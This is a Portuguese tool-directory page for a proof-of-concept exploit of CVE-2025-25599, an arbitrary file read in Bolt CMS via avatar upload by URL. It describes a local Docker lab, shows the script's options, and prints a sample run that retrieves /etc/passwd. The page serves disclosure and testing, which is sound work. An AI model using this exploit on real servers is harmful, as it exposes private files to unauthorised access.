Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-25599 — Prova de Conceito para CVE-2025-25599 | Kitploit
Ferramentas/GitHubGitHub/certitude-consulting/cve-2025-25599
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubcertitude-consulting/cve-2025-25599

CVE-2025-25599

Prova de Conceito para CVE-2025-25599

Ver Repositório
212há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-25599

Detalhes

Bolt é um sistema de gerenciamento de conteúdo de código aberto construído usando o Symfony PHP framework. Durante uma breve avaliação de segurança, a Certitude identificou várias vulnerabilidades, incluindo uma leitura arbitrária de arquivos.

Usuários com as funções EDITOR, CHIEF_EDITOR, ADMIN ou DEVELOPER podem abusar de uma divulgação insegura de arquivo temporário ao fazer upload de um avatar via URL para ler arquivos arbitrários do servidor subjacente.

Para mais detalhes, consulte esta publicação no blog.

Prova de Conceito

Docker

Um contêiner Docker está incluído para teste. Ele instala e executa o Bolt CMS 2.3.20 a partir do composer em uma base debian. Quando estiver em execução, o Bolt estará acessível em http://localhost:8001.

root@kitploit:~
sudo docker compose up --build

Uso

root@kitploit:~
python3 poc.py -h
usage: poc.py [-h] -u USERNAME -p PASSWORD -U URL [-f FILE] [-v] [-o OUT]

Proof of concept script for CVE-2025-25599

options:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Username of a user who has the EDITOR role or higher
  -p PASSWORD, --password PASSWORD
  -U URL, --url URL     URL for website running Bolt CMS (e.g. http://127.0.0.1)
  -f FILE, --file FILE  (Optional) Full path of the file to download (Default: /etc/passwd)
  -v, --verbose         (Optional) Increase verbosity
  -o OUT, --out OUT     (Optional) Path to store downloaded file
Baixar ferramenta

Exemplo de saída

root@kitploit:~
python3 poc.py -u editor -p password -U http://localhost:8001/ -f /etc/passwd -v
[+] Found Bolt login page
[*] _token = 3fa91864a4dce766...SNIP...ERwLEK7jMnXOarGA
[+] Logged in as "editor"
[*] _csrf_token = 42fd9dc3d163fdff...SNIP...ti7VhvNHsH0xSi-A
[*] Starting upload and download threads...
[+] Downloaded "/etc/passwd"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin